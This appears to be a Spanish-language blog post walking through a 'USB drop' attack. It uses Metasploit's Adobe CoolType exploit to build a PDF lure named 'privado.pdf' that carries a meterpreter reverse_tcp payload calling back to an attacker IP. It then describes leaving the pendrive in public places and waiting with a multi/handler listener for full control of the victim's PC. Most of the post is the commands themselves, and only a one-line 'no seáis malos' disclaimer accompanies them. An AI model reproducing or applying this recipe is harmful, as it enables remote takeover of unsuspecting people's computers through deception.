Un Pendrive y un poco de Ingeniería Social


Hola a tod@s! 

En anteriores post sobre Metasploit hablamos sobre un exploit famoso Hoy quiero comenzar lanzando una pregunta,
 ¿Qué pasaría si se dejará olvidado un pendrive en la calle? Quien dice la calle, dice la universidad, la oficina, el gimnasio o el centro comercial, lo que ocurriría es que alguien se lo encontraría y quedará pensando que tiene un día de suerte y si además os digo que el pendrive contiene un fichero en formato PDF con nombre Privado, pues que la gente es muy curiosa y más si el fichero se llama privado, confidencial etcétera, cuanto mas privativo sea, más lo querrán ver, lo que ocurre es que la curiosidad mato al gato.

Después de esta introducción vamos a exponer la prueba, para ello necesitaremos la ingeniería social, un pendrive, Metasploit y las vulnerabilidades típicas de Adobe. 


El primer paso sería abrir Metasploit e indicarle que exploit queremos usar, en este caso el adobe cooltype:

use exploit/windows/ fileformat/adobe_cooltype_sing


A continuación indicar el nombre del fichero, recordad un nombre curioso para que sea fácil de abrir:

set FILENAME privado.pdf


Indicar el PAYLOAD  a utilizar, yo usare como no meterpreter:

set PAYLOAD windows/meterpreter/reverse_tcp


En esta fase hay que poner la dirección de la maquina atacante:

set LHOST 192.168.1.133


Y por último solo queda lanzar el exploit.

exploit   




Imagen 1: Configuración del Exploit


A continaución observad la ruta donde se creo el archivo PDF y copiad dicho archivo a un pendrive.
Minimizar la consola de comandos y abrir otra consola que quedará a la espera en la que escribiremos:
Msfcli exploit/multi/handler PAYLOAD=Windows/meterpreter/reverse_tcp LHOST=192.168.1.133


Imagen 2: Conexión a la espera


Para cerciorarnos de que se encuentra a la espera podemos hacer un netstat y podemos observar como efectivamente se encuentra a la espera por el puerto 4444.

Imagen 3: Netstat





 
Imagen 4: Archivo PDF listo 


Por último sólo bastaría dejar el pendrive con un poco de Ingeniería Social y que alguien ejecutará el archivo para darnos una sesión de meterpreter y tener acceso total al PC víctima.



 No seáis malos. 
 

Share this

Related Posts

Previous
Next Post »